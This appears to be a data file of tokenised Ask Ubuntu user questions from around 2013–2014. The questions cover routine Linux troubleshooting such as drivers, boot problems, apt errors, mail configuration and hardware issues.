436252	uninstall ubuntu 12.10 installed alongside windows 8	i installed ubuntu 12.10 on a windows 8 hp probook 4540 series laptop alongside windows 8 instead of installing in a different partition i had already created . my problem is how to unistall the ubuntu and then install back in a separate partition without losing my windows 8 installation and my files . please help me ... .
436255	some noob questions	i 'm pretty new to ubuntu and i 've had some issues which i want to make sure are ok . whenever i boot i get two lines of text . it 's hard to read because it flashes very fast , however it 's something about edac and not being able to locate the sbridge . i also have an nvidia gtx 650 graphics card and i 'm not sure which proprietary driver to install since they all have the same name and no dates . which one should i install ? thanks in advance : )
436256	lan drivers missing after updating 12.04	lenovo m93p tower i have installed 12.04 os . in ubuntu centre there are few updates as sson as i update and restart lan drivers are missing . can anyone help with this issue or help me installing the required driver .
436258	ubuntu one on a single computer with windows and ubuntu	i have a single laptop with ubuntu and windows 8 in different partitions . all my important files are in the windows partition so they can be accessed from both environments , and uploaded to skydrive when i 'm on windows . the thing is , i use ubuntu much more often than windows so i need to migrate my cloud service and it seems that ubuntu one would be the obvious choice . now , i 'd like my files to be synchronized in ubuntu one regardless of the os i 'm running ( the same set of files ) . can i achieve this without having to duplicate my files in my hd ? thanks !
436260	sm-msp-queue says : unable to qualify my own domain name ( xxx ) -- using short name	every 20 minutes , for days , sm-msp-queue ( something related to sendmail , i guess ) writes a message in my ubun that goes like that : unable to qualify my own domain name ( ubun ) -- using short name where ubun is the network node hostname ( output of uname -n and contents of /etc/hostname ) . the contents of /etc/mail/local-host-names include two lines : localhost and ubun . the file /etc/hosts begins with two lines : 127.0.0.1 localhost 127.0.0.1 ubun the file /etc/cron.d/sendmail contains one cronjob that is set to run every 20 minutes : */20 * * * * smmsp test -x /etc/init.d/sendmail & & /usr/share/sendmail/sendmail cron-msp however , i do n't know what the command smmsp should do ; i ca n't run it alone , also with sudo ( i get sudo : smmsp : command not found ) . running sudo /usr/share/sendmail/sendmail cron-msp seems to be doing nothing . any ideas ?
436262	how to revert to legacy switching layout method ?	i 'm using xneur to quickly switch between input languages ( russian and english ) . since ubuntu 13.10 implemented new method of switching keyboard layout it is not possible for this software to operate correctly now . how can i revert back to legacy keyboard switching method ? some screenshots :
436264	is there an alarm-clock / timer for ubuntu 13.10 ?	i 'd like to use a timer / alarm-lock for ubuntu 13.10 , that appears next to or within the dropdom-menu of the clock in the top-panel . i tried e.g . `` gnome-shell-timer '' , `` alarm-clock '' , but both seem not to work within the unity desktop environment ( and result in system crashes ) . is there not timer for unity available ?
436266	nvidia gt610 card with ksp	i have new graphics card for my pc , it 's asus branded nvidia geforce gt 610 with 1 gb ram . pc is three years old asus motherboard without any extras , just dual core cpu with 6 gb ram plus hd and dvd drive . i want to get ksp working on this . it has been running , but was very slow and after some while did crash the machine . i run ubuntu 12.04 lts in 32-bit mode for compatibility and stability reasons , at least i hoped them to be better than newer versions and 64-bit version . i bought graphics card to improve the performance , but found new problems . i got it installed , bios does recognice new card and i got drivers installed thanks to help from trying to install proprietory nvidia graphics drivers it seems to be there as command 'glxinfo | grep renderer ' returns : opengl renderer string : geforce gt 610/pcie/sse2 i assume that gpu is not used as system settings > additional drivers shows few nvidia drivers activated but not currently used . playing video loads cpu between 30 to 50 % , as earlier . after installation ksp stopped to launch , instead it crashes when loading `` squad parts '' any ideas what to do next ? changing nvidia card to other manufacturer might not do miracle , based on what i read ... is there any sw to test graphics card functionality ? have seen cuda graphic demos mentioned , but did not found them ( easily ) : (
436272	unable to find except package	when i try the command sudo apt-get -y install gcc make linux-headers- $ ( uname -r ) except i get the following error message e : unable to locate package except . how to resolve it ?
436274	i ca n't change the username ?	whenever i 'm trying to change the username i get this error : usermod : can not lock /etc/passwd ; try again later what 's the solution for this ?
436275	install ubuntu 13.10 in virtualbox	i want to install ubuntu-13.10-desktop-i386 in oracle virtualbox on my hp laptop , which has windows 7 32-bit installed . i tried to install it , but it has problems like : internal error when i login in to my system . after the installation is completed , it asks me to restart . when i restart , virtualbox suddenly stops working and the whole process crashes .
436278	how do i list commands a package provides ?	i 'm curious what commands a certain package provides my system with . by command , i mean an in-path executable that i can run from the command line ( ls , grep , sed , etc ) . i 'm not trying to work out the package from the command , which can be done with : dpkg -s `which command` i want the opposite , a list of commands from a package .
436281	`` noise '' on some windows ( display problems )	i have a asus notebook , with a standard ubuntu 13.10 installation . the video controller is vga compatible controller 3rd generation intel core processor graphics controller . everything works fine except that from time to time ( once every day ) some open windows get filled with black dashes and dots . sparsely filled . it looks like tv noise in an old tv set getting a weak signal . the contents of the affected windows are still readable . normally moving the mouse a little bit clears the problem . i must say that it is not a serious problem , it 's just annoying . the left and top bars of the unity interface are not affected ! just the applications ' open windows , so i think it is not a hardware issue . i did not find a way of reproducing the problem , it just happens very seldom . do you have any hints about how to diagnose the problem ?
436283	remove options from messaging indicators ubuntu 12.04	i want to remove some options from the messaging indicators as explained in this post . i did the procedure for the broadcast option and also for ubuntu one . after i log out and log back in i noticed that the icons were not there at the beginning , but after a short time they appeared again . i was wondering if someone knows how to fix this . i am running ubuntu 12.04 .
436284	'apt-get upgrade ' getting stuck	when trying to install updates after checking with sudo apt-get update , sudo-apt get upgrade is not installing them . username @ username : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : linux-headers-generic-lts-raring linux-image-generic-lts-raring the following packages will be upgraded : gir1.2-gtk-3.0 libgail-3-0 libgtk-3-0 libgtk-3-bin libgtk-3-common sudo tzdata update-manager-core 8 to upgrade , 0 to newly install , 0 to remove and 2 not to upgrade . need to get 0 b/3,634 kb of archives . after this operation , 47.1 kb disk space will be freed . do you want to continue [ y/n ] ? y reading changelogs ... done get:1 changelog for libgtk-3-common ( http : //changelogs.ubuntu.com/changelogs/pool/main/g/gtk+3.0/gtk+3.0_3.4.2-0ubuntu0.7/changelog ) [ 189 kb ] gtk+3.0 ( 3.4.2-0ubuntu0.7 ) precise-security ; urgency=medium * security update : fix regression from librsvg cve-2013-1881 security fix - debian/patches/cve-2013-1881-compat.patch : embed payload in a data : uri to work around rsvg loader security fix in gtk/gtkicontheme.c . - cve-2013-1881 -- marc deslauriers < marc.deslauriers @ ubuntu.com > fri , 14 mar 2014 10:11:57 -0400 get:1 changelog for sudo ( http : //changelogs.ubuntu.com/changelogs/pool/main/s/sudo/sudo_1.8.3p1-1ubuntu3.6/changelog ) [ 47.4 kb ] sudo ( 1.8.3p1-1ubuntu3.6 ) precise-security ; urgency=medium * security update : security policy bypass when env_reset is disabled - debian/patches/cve-2014-0106.patch : fix logic inversion in plugins/sudoers/env.c . - cve-2014-0106 * debian/sudo.sudo.init , debian/sudo-ldap.sudo.init : set timestamps to epoch in init scripts so they are properly invalidated . ( lp : # 1223297 ) -- marc deslauriers < marc.deslauriers @ ubuntu.com > tue , 11 mar 2014 07:56:53 -0400 get:1 changelog for tzdata ( http : //changelogs.ubuntu.com/changelogs/pool/main/t/tzdata/tzdata_2014a-0ubuntu0.12.04/changelog ) [ 37.3 kb ] tzdata ( 2014a-0ubuntu0.12.04 ) precise ; urgency=medium * new upstream release , with updated turkish dst ( lp : # 1290193 ) * remove solar87 , solar88 , solar89 , following upstream removal . -- adam conrad < adconrad @ ubuntu.com > thu , 13 mar 2014 17:44:33 -0600 get:1 changelog for update-manager-core ( http : //changelogs.ubuntu.com/changelogs/pool/main/u/update-manager/update-manager_0.156.14.12/changelog ) [ 230 kb ] update-manager ( 1:0.156.14.12 ) precise-proposed ; urgency=medium * debian/source_update-manager.py : create a duplicatesignature by replacing the tmpdir name in the traceback ( lp : # 1289580 ) -- brian murray < brian @ ubuntu.com > mon , 10 mar 2014 10:40:57 -0700 ~ ~ ~ ~ ~ ~ any idea why it is stopping here ?
436287	exim4 , dovecot , gmail	we are trying to set up a mail server for outgoing mails using gmail . the application is based on java . in config file smtp.gmail.com and port 587 is added same port is added in exim4-config file . but when mail is checked it throws an error as `` com.sun.mail.smtp.smtpsendfailedexception:530 5.7.0 must issue a starttls command first . can someone pl . help to sort out this error . do we need to add any configuration in our tomcat/conf/server.xml file . if mail is sent directly through squirrelmail client it delivers in gmail account but the above error comes through tomcat . anyhelp is greatly appreciated .
436291	usb ports fried ? how to diagnose/fix ?	i 've just run into a probably serious problem . was working on a hardware project where a short circuited component was involved and it 's possible i 've fried two usb ports with a 12v on my laptop since when i connect the mouse or my phone they do n't work as they should , however my phone thinks like it 's connected to a charger . what happened : connected that component to one of the two usb 3.0 ports on the laptop and as soon as i connected the power , laptop immediately shut down obviously protecting itself . afterwards , booted up normally but those two ports wo n't work as before . restarted many times etc , but still nothing . mouse wo n't work and the phone thinks it 's connected to a charger instead of a computer , so there 's still some current running there . ran this : dmesg | grep -i usb but could n't detect any `` movement '' in those two usb ports . so , how do i know if usb ports can be revived ? i could only found various instructions in windows but nothing in ubuntu . is there something i can do in general ?
436293	can not re-master ubuntu 's iso image unto a usb drive	i know the topic might be confusing but the problem itself seems bizarre to me . if i 'll take ubuntu 's iso file ( on this occasion i 'm using 12.0.4-2 server ) and apply it to a usb drive with the following command : dd if=/path/to/iso of=/dev/sdc bs=1m every server i try can boot from the usb drive without a problem and everything is fine and dandy . however , if i re-master the iso using the following steps : mount -o loop /path/to/iso /mnt/iso rsync -av /mnt/iso /some/directory mkisofs -d -r -v `` label '' -cache-inodes -j -l -b isolinux/isolinux.bin -c isolinux/boot.cat -no-emul-boot -boot-load-size 4 -boot-info-table -o /path/to/new/iso /some/directory and then : dd if=/path/to/new/iso of=/dev/sdc bs=1m the usb drive is not bootable . this happens even if i dont change anything in the content of the iso . just copying it and rebuilding the iso removes the bootable option . my goal is to create the iso file to be 'dd ' ready . so we can just deploy it on any usb key without any other software what am i doing wrong ?
436294	how to find all the available commands in a package before installing it ?	this question clearly explains about how to find all the commands which are provided by a particular installed package . my question is , how to find ( or lists ) all the available commands which are provided by a particular package before installing that package via terminal ?
436295	what is the best editor for c++ . i want to use c++ for my masters project	what is the best editor for c++ . i want to use c++ for my masters project . please suggest the best editor for c++
436298	currently best git ui tool ?	what is the best git ui tool at this moment ? i am currently using ubuntu built-in git-gui tool but i am not sure if there is a better one ( like tortoise* close for ubuntu ) . i 've checked other topics like this , but i see people recommending one app being best for a , another best for b , etc . not a concrete 1-tool solution .
436300	writing manuscript in the latex template of epj	i am trying to write my manuscript in the latex template of epj ( european physical journal ) . i followed the instructions exactly that were in the readme for installation , but when i try to type something in the template , it gives me an error as follows : the file could not be saved . please check if you have write permission . what do i have to do in order to solve this problem ?
436304	launch a new window from gtk+3 app	i want to create an ubuntu app using python and gtk+3 . i want to get the contents of the file displayed in the main window and load it into a separate window ( load it into another textview for example ) . i do n't know how i can possibly do this though , is there anyone out there who knows how i can do this ?
436306	what are the interrupts that user can invoke in terminal	i know of one interrupt , i.e ctrl+c which can be invoked by user in terminal . ( can it be invoked elsewhere ? ) are there any other interrupts that can also be invoked by user ?
436308	is there any way to post blog other than rake deploy in octopress ?	i have googled around , but without any luck . i am running octopress on ubuntu 12.04lts . i have wrote new blog , but i have no idea is there anyway to post blog other than rake deploy . rake deploy works , but it 's slow . ( i guess git may work . but i believe there must be other easy ways to post blog )
436309	is there any powerpoint alternative ?	is there any powerpoint alternative ? i 'm not looking for just a viewer but also a presentation maker .
436316	create tab using gtk+3 and python and load file into it	i want to create an ubuntu app using gtk+3 and python . in the app i want to be able to get the file from the user ; create a tab and load the file into it ( i.e . into the textview that will be available in the tab ) . that will require quite a bit of code , i should think , so i wo n't ask anyone to do that ! what would be very helpful though would be some help on creating a tab using gtk+3 and connecting a signal-handler to it . wacking great big thanks in advance !
436317	nvidia geforce fx 5200 hibernation / suspend not working	i have an old pc with nvidia geforce fx5200 . i have ubuntu 12.04 using nouveau driver and everything works smoothly except hibernation/suspend . i also want to have two monitors connected as such : a ) fujitsu monitor connected with vga cable b ) samsung monitor connected with dvi ( using dvi to vga adaptor ) to sum up i want to have dual monitor and hibernation working . so i have tried these options : using nouveau driver both monitors work perfectly , i can change resolution , refresh rate separately for each monitor and setup a type of twinview or separate x screens with arandr.though arandr finds 3 monitor options : vga , tv , dvi , and i have to disable tv , then enable dvi . this setup is flawless with good performance i must say ( i have n't tried 3d as i 'm not interested ) .but i can not hibernate/suspend at all . monitors turn off , and computer hangs without ever closing . using nvidia-173.14.39 as recomended by additional drivers i have to do these steps after installing the driver : a ) uninstall nvidia-settings coming with it and download a deb package of an older version of nvidia-settings since i get the error that the driver is older for current nvidia-settings b ) use older nvidia-settings to setup separate x screens ( or twinview ) , and then edit xorg.conf by adding option `` nvagp '' `` 1 '' ( found this by googling a lot ) to the device sections on xorg.conf and then blacklisting the intel_agp . these settings allows me to be able to hibernate/suspend and have separate x or twinview . so you might ask why not use these settings ? cause using nvidia-173 with separate x or twinview i 'm stuck with 1024x800 resolution and 50 refresh rate.no matter how much i change xorg.conf these settings never change ! i 'm stuck with it . i can not change resolution for each monitor . plus nvidia-settings dont recongise second monitor as connected with dvi whilst arandr did ! in my opinion ( i 'm a noob though ) i think nouveau driver can not handle my agp video card and put the pc in hibernation/suspend.it 's like nvidia card keeps computer running . lsmod shows no agp module ! no intel_agp..nothing . is it possible to resolve this somehow ? my suggestion is this ( forgive me if it seems stupid ) : install nvidia-173 set up separate x screens as in step 2 above with nvidia-settings then force using nouveau drive but keeping nvidia-173 so than i can have nvagp 1 in xorg.conf . is this stupid ? *edit : yes it is . tried it . nouveau can not use option nvagp as it 's for nvidia driver only , bum : ( * any suggestions welcome , any !
436318	search google from terminal	how to add search google in my terminal ? same like this picture . i 'm using ubuntu 12.04 .
436322	use one ppa in another ppa	i would like to create a ppa for package that is not in ubuntu yet . it has a dependency on another piece of software which is n't in the official repository either , but available from another ppa . is it possible to source that ppa into mine without manually copying over the packages for every new upload ?
436323	does sony/logitech eyetoy work under ubuntu 13.10 ?	sony eyetoy webcam + mic ( made by logitech ) used to work with ubuntu 12.04 . is this still true with 13.10 ? when i connect it to my pc lsusb sees it only as an audio device but where is the video part of it ?
436327	`` ztemtvcdromd : no process found '' when removing crossplatformui	when i am doing sudo apt-get update or sudo apt-get install ( any software ) then this is showing in terminal extracting templates from packages : 100 % ( reading database ... 146237 files and directories currently installed . ) removing crossplatformui ... ztemtvcdromd : no process found dpkg : error processing crossplatformui ( -- remove ) : subprocess installed post-removal script returned error exit status 1 errors were encountered while processing : crossplatformui e : sub-process /usr/bin/dpkg returned an error code ( 1 )
436329	error while installing bully	recently i tried to install bully , but no matter which version i used , the same error occurred : andy @ anti : ~/arbeitsfl채che/bully-1.0-22/src $ make cc -i`pwd` -i`pwd`/utils/ -i`pwd`/tls/ -i`pwd`/wps/ -i`pwd`/crypto/ -i`pwd`/common/ -o bully bully.c -lpcap -lssl -lcrypto in file included from bully.c:63:0 : crypto/crypto_openssl.c:16:30 : schwerwiegender fehler : openssl/opensslv.h : datei oder verzeichnis nicht gefunden kompilierung beendet . make : *** [ bully ] fehler 1 andy @ anti : ~/arbeitsfl채che/bully-1.0-22/src $ sorry for posting in german , the error means `` fatal error [ ... ] file or directory not found '' . what causes this error ? many thanks
436331	ubuntu gui is not launching after updating from 12.04 to 12.10	i 've got a little problem after updating from 12.04 to 12.10 . i 've updated ubuntu from update manager , and then reboot it . after the reboot i discovered that grub has crashed . after i repaired it , the another problem appeared , the gui doesnt start . in a moment it promts that kvm : disabled by bios four times and then text login screen appears and says : ubuntu 12.10 marky-ub tty1 marky-ub login : _ how to fix it ? help me please .
436333	lenovo b590/ ubuntu 12.04 / keyboard and mouse do n't work	i 've a lenovo b590 laptop with ubuntu 12.04 lts . both the keyboard and mouse were doing well until yesterday when power cut off . keyboard still works in dos but it does n't work when on ubuntu and so does the mouse . i opened additional drivers but it did n't find out a problem with them .
436334	why are ssh_tty and ssh_connection variables empty ?	i know that upon a successful connection , openssh sets several environment variables . ssh_connection shows the address of the client , the outgoing port on the client , the address of the server and the incoming port on the server . ssh_tty names the pseudo-terminal device , abbreviated ppty , on the server used by the connection . now i ssh to my server ssh user @ 192.168.1.1 and the result welcome to ubuntu 12.04.2 lts ( gnu/linux 3.2.0-54-generic x86_64 ) * documentation : https : //help.ubuntu.com/ last login : mon jul 29 10:22:12 2013 now i do this : echo $ ssh_connection and echo $ ssh_tty but the result is empty ! ! ! ! why this happens ? !
436337	synaptic touchpad settings not saving	i 've seen a million questions about synaptic touchpads , but i think mine might be a little different . i 'm a linux user for about 2 days now , so maybe i 'm not seeing something right . i 'm able to modify my settings using the commands via terminal using synclient < option > , and they stick . upon reboot , however , the settings are lost . if this has already been answered , please forward me there as i 've spent both days of my linux experience trying to resolve this . thanks . dell l321x ( 13 '' ultrabook ) running ubuntu 12.04
436342	is the plymouth debugger a normal startup command/option ?	i 'm wondering if plymouth debugger is a normal startup procedure ? i have 12.10 and had 12.04 on this machine when i got it . i 'm new to linux/ubuntu and was fooling around with it when i first got it and somehow a : lost the pretty spinfinity splash screen . ( which i would like to recover . ) & b : have this really noisy startup screen , that includes i believe to be a echo'ed copy of the plymouth debugger working ... however i 'm not sure how to screen capture a copy of my startup file to post here ... a little advice would be grand !
436344	keyboard is not working after a while	after a while my usb keyboard stops working . my usb mouse works fine . in order to restore the keyboard , i have to reboot my computer . on another partition i have windows 7 installed , does this relate to my problem ? on windows 7 , the keyboard does not work properly either : i press a key , i get another different one . i am using ubuntu 12.04 lts ( 64-bit ) .
436345	ubuntu desktop messed up ?	i have hp probook 4540s with switchable graphic card radeon hd 7650m , its working fine on windows but it would cause heat problems so followed the question which said solution is to install the additional drivers , i did that which did n't solve the overheat problem so i was finding a way to switch between graphic cards like i can do in windows 8 , so i installed the catalyst control center for the amd graphics accelerators from the ubuntu software center after reboot i logged in it did n't show up anything just a black blank screen and a cursor so after that i tried this question the second answer to that . in that answer it tells to add a repository sudo add-apt-repository ppa : andrikos and sudo apt-get update now have problem at the end of update which is some gpg error following signature couldnt be verified because public key is not available w : failed to fetch http : //ppa.launchpad.net/andrikos/ppa/ubuntu/dists/saucy/main/binary-i386/packages 404 not found so now i can not proceed because of that i tried to remove the repository by sudo add-apt-repository -- remove ppa : andrikos gives the error can not add ppa : 'ppa : andrikos ' & please check that the ppa name or format is correct ubuntu 13.10 so now i am in trouble ! any suggestion ?
436348	lenovo s540 , `` the system is running in low graphics mode ''	i 've just installed ubuntu 13.10 through the installer on a lenovo thinkpad s540 . i had no problems with the graphical installer . however , after rebooting , x does n't start . i just get a `` the system is running in low graphics mode '' error . the graphics card is a `` intel corporation haswell-ult integrated graphics controller '' . i 've tried updating from the x-swat ppa as per instructions here : http : //askubuntu.com/a/218095/258364 . made no difference . it also fails if i reboot in `` failsafe '' mode . any ideas on what i can try ? thanks .
436349	apt keeps trying to connect to a non-existent proxy	i have an apt proxy on my home network which is running squid-deb-proxy , all my ubuntu machines are linked to it with a 02proxy file in their apt directorys . the problem is one of my ubuntu machines sometimes tries to connect to an ip which does n't even exist on my network when installing or updating software . the ip address of my proxy machine is 10.1.1.31 yet the client ubuntu machine sometimes ( not always ) tries to connect to 10.1.1.8 , i have no idea what 's causing it to do this . any help is much appreciated .
436350	two keyboard , separate entity , multiplexing	how to plug-in two usb keyboards and have them recognized as separate entity ? is it possible to do it by multiplexing ?
436352	12.04 server , all external services not connecting after reboot	i have just updated my server and rebooted and now my ssh , apache and some other services will not allow connection from external clients . i have disabled ufw and turned off modsecurity but neither of these make any difference . i have tried a tcpdump on port 80 and my custom ssh port and both show that the nic is receiving the packets . my apache logs show no indication that any external requests are hitting apache , but then as i ca n't connect over ssh i do n't think this is an apache issue . i recently applied security measures as described here : securing ubuntu i also performed these measures on 2 other 12.04 servers and they are still responding to external requests . luckily this is a vm so i can access the terminal via vsphere . i am relatively new to linux so i have come to the end of my knowledge and do not know what to try next . please help : ) many thanks . bev .
436353	how are ubuntu iso 's built ?	i wanted to try making a custom iso with some extra packages . though it is possible to do this manually ( by editing a standard iso ) using various tools , i want to do this automatically from the repositories , the same way the daily builds of the ubuntu iso is made . how does the ubuntu server do it/ how can i reproduce it ?
436354	how to check the disk activity of my hard-drive ?	i had a problem in windows 8 where my hard-drive activity was reaching 100 % all the time and the system was very slow . now i 've switched to ubuntu gnome and want to check if this is still a problem on ubuntu . is there a way to check this ? i am not looking for how much space i have on my hdd ! i know how to find cpu and ram usage as well . i am looking to find out the disk activity of my drive . for example , using windows task manager it reports the disk activity as 0.04 % . this is what i am looking for :
436355	flash player sometimes works , but sometimes does n't	i am on ubuntu 12.04 . i 've been using firefox and when i opened for example a youtube link , the screen where the video is supposed to be is black and it displays an error . when i click on some recommended link for that video , and return back to the video with the error it starts playing normally . i thought it is some problem with flash , so i installed chromium ( i found out it provides flash ) , but there is the same problem again . i have the flash player plugin installed , also tried restricted extras , and html5 is enabled in youtube ...
436361	sound card does n't support format requested using signalgen	i want to generate a pwm signal on ubuntu . my first try was to use siggen package . upon launching signalgen i have the following error : $ signalgen -v sin 120 signalgen ver . 2.3.10 ( may 2008 ) digital signal generator /dev/dsp : dac opened for output 22050 mono , signed 16 bit , little endian , samples/sec . 8192 bytes per dac buffer . [ signalgen ] invalid argument : sound card does n't support format requested . $ sudo signalgen -v sin 120 signalgen ver . 2.3.10 ( may 2008 ) digital signal generator [ signalgen ] input/output error : /dev/dsp what is wrong ?
436363	laptop turns off on its own in 13.10 ?	i recently upgraded to 13.10 from 12.10 . it 's now showing the battery info wrong and it keeps turning off even with 60 % of power remaining , and without warning . when i resboot the pc , it works fine for 30 minutes or so and then the same thing over again . i did n't had this problem with 12.10 . also , i have installed tlp , but that 's not helping either . the hardware : pc : hp 2000-2116tu cpu : intel i5 ( 3rd generation ) graphics : intel hd4000
436366	i am not able to install any packages via apt-get , why ?	i am getting this error whenever i install any package from the terminal . what is wrong ? apt-get install gnome-tweak-tool reading package lists ... done building dependency tree reading state information ... done package gnome-tweak-tool is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'gnome-tweak-tool ' has no installation candidate
436368	how to solve `` wodim no such file or directory. can not open scsi driver '' in 12.04lts	i 'm created a shell script to burn a cd , which was running successful in ubuntu terminal , but it not running if i call this script from php and also i found an error in log file like , wodim : no such file or directory . can not open scsi driver ! for possible targets try 'wodim -- devices ' or 'wodim -scanbus ' . for possible transport specifiers try 'wodim dev=help ' . for ide/atapi devices configuration , see the file readme.atapi.setup from the wodim documentation . toc type : 3 = cd-rom xa mode 2 if i look wodim -- devices in terminal -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 0 dev='/dev/sg1 ' rwrw -- : 'tsstcorp ' 'cddvdw sh-s202j' -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - if i look wodim -scanbus in terminal scsibus4 : 4,0,0 400 ) 'tsstcorp ' 'cddvdw sh-s202j ' 'sb01 ' removable cd-rom 4,1,0 401 ) * 4,2,0 402 ) * 4,3,0 403 ) * 4,4,0 404 ) * 4,5,0 405 ) * 4,6,0 406 ) * 4,7,0 407 ) * please help me to find a solution .
436374	how to get rid of the gallium 0.4 on llvmpipe ( llvm 0x300 ) driver ? intel needed	ubuntu 12.04 lts only runs 2d mode after changing mb and cpu . it appears using the wrong video driver : `` gallium 0.4 on llvmpipe ( llvm 0x300 ) '' rather than the required `` intel '' g43 version from the `` xserver-xorg-video-intel '' driver package . the new motherboard is a msi z87-g43 with a i7 cpu . i tried lots of things and checked out about all i could find on the web . i removed the vmware drivers , nvidia en ati divers and their configuration files without result . creating an etc/x11/xorg.conf file with `` intel '' assigned to be used , the system became instable . i even did a fresh ubuntu 12.04 install on an old hd , finding out that the meant `` intel '' driver appeared to be used ! now i 'm stuck ! what should i do to get it right for my existing ubuntu 12.04 lts system ?
436375	battery led blinking red on asus n550jv with ubuntu 12.04	model : asus n550jv os : i have a dual boot win8 and ubuntu 12.04 64bit . uefi boot problem : the battery is not recharging anymore . it means the computer works as usual but once i plugged off the charger the battery level only goes down . even if i plug in the charger , the battery level stays the same . as a result there is a red light blinking in the battery led . hereunder there are some details the ( battery ) red light is blinking when : computer off , charger plugged in computer on , charger plugged in computer on , charger plugged of when the red light started blinking the first time happened the following : ( previously there is no problem ) i turned on the computer and , for some unknown reasons , since the beginning the two fans were running at 100 % . once i logged in , the operating system ( os ) did n't recognize the battery , like my pc was a desktop and not a notebook ( the two fans were still running at 100 % ) i turned off and turned on the pc : fans are ok , but the battery red light is blinking as above . my best guess is that it 's an hardware problem , however i gave back my computer to repair ( it is under warranty ) and they gave me the another computer ( same model ) as substitution , moving the hd from one pc to the another . even in the second pc now i have the same problem . here it is my boot repair info log : http : //paste.ubuntu.com/7119508/ here it is my dmesg : http : //paste.ubuntu.com/7119802/ i 'm open to any suggestion and to provide you any details . thanks in advance
436376	ubuntu 12.04 lts brightness	i 'm using ubuntu 12.04 lts but the brightness wo n't work . not from settings , not from the hotkeys . is there anything i can do to fix this ? i have dell inspiron 15 .
436379	banshee - have to restart in order to play another selection	i have 3 internet radio stations i listen to . when i stop playing one station and then select another station the timer shows that it 's playing , but no sound . the only way to play is to stop the playing the ghost and then close the program and restart it . i tried this with music file too , so it 's not the radio stations that are the cause . i did remove banssee and re-install thinking this would help , but did not help . i searched but ca n't find any mention of this issue .
436380	problem building an rtl8723 driver	we all know the problems with rtl8723 wireless card and some people achieved to install but i ca n't . i have ubuntu 12.10 . when i do the make in terminal , it gives me this error make -c /lib/modules/3.8.0-37-generic/build m=/home/adrian/desktop/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-37-generic' cc [ m ] /home/adrian/desktop/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.o in file included from /home/adrian/desktop/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:39:0 : /home/adrian/desktop/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/pci.h:245:15 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rtl_pci_probe’ /home/adrian/desktop/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c : in function ‘_rtl_init_mac80211’ : /home/adrian/desktop/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:320:6 : error : ‘ieee80211_hw_beacon_filter’ undeclared ( first use in this function ) /home/adrian/desktop/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:320:6 : note : each undeclared identifier is reported only once for each function it appears in /home/adrian/desktop/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c : in function ‘rtl_action_proc’ : /home/adrian/desktop/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:870:25 : error : ‘rx_flag_mactime_mpdu’ undeclared ( first use in this function ) /home/adrian/desktop/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c : in function ‘rtl_send_smps_action’ : /home/adrian/desktop/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.c:1432:16 : error : ‘struct < anonymous > ’ has no member named ‘sta’ make [ 2 ] : *** [ /home/adrian/desktop/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012/base.o ] error 1 make [ 1 ] : *** [ _module_/home/adrian/desktop/rtl_92ce_92se_92de_8723ae_linux_mac80211_0006.0514.2012 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-37-generic' make : *** [ all ] error 2
436382	why does unity not showing wallpaper after installing gnome ?	i am using ubuntu 13.10.my system works very fine until i installed gnome desktop and cinnamon.cinnamon was n't working then i removed it.unity 's desktop is fully black.right now , gnome works just fine i also want unity .
436384	how to fix boot issue ? vfs : can not open root device `` mapper/x '' or unknown-block ( 0,0 )	i 've got ubuntu 12.04 running as a virtualserver on virtualbox . last night there was a power surge and this morning i ca n't boot my virtual server . i get a long error message . i picked this up : vfs : can not open root device `` mapper/ubuntu -- server-root '' or unknown-block ( 0,0 ) : error -6 when i do : ls /dev/mapper i get > control ubuntu -- server-root ubuntu -- server-swap_1 i can mount manually by doing 'mkdir /foo ; mount /dev/mapper/ubuntu -- server-root /foo' i do n't know what to do but i installed a tool and extracted this log http : //paste.ubuntu.com/7119904/
436385	segmentation fault when installing librsvg2-common and libgdk-pixbuf2.0	if you are also affected , upvote the question so it causes more attention . my system is ubuntu 12.04 on linux 3.8.0-37-generic . i got some crash report after a system update today ( seemly from librsvg2-common ) . after i reboot the pc , i notice some of the icons are missing . in addition , i can not open some image files formats like .png files . after some googling i tried to re-install librsvg-related packages . but i constantly got segmentation fault unpacking librsvg2-common ( from ... /librsvg2-common_2.36.1-0ubuntu1.1_amd64.deb ) ... processing triggers for libgdk-pixbuf2.0-0 ... segmentation fault ( core dumped ) setting up librsvg2-common ( 2.36.1-0ubuntu1.1 ) ... processing triggers for libgdk-pixbuf2.0-0 ... segmentation fault ( core dumped ) i also tried to force reinstall libgdk-pixbuf2.0 related package but got segmentation fault , too . i also tried : sudo rm /var/cache/apt/*.bin and sudo apt-get install -f but it did not help . i downloaded the .deb package and tried installing it but same segfault msg . how could i possibly have libgdk-pixbuf2.0 and librsvg2-common packages installed ? or can i roll back to the point before the system update ? update : i carefully checked all the dependencies ' versions in the precise-update database and none of them have problems .
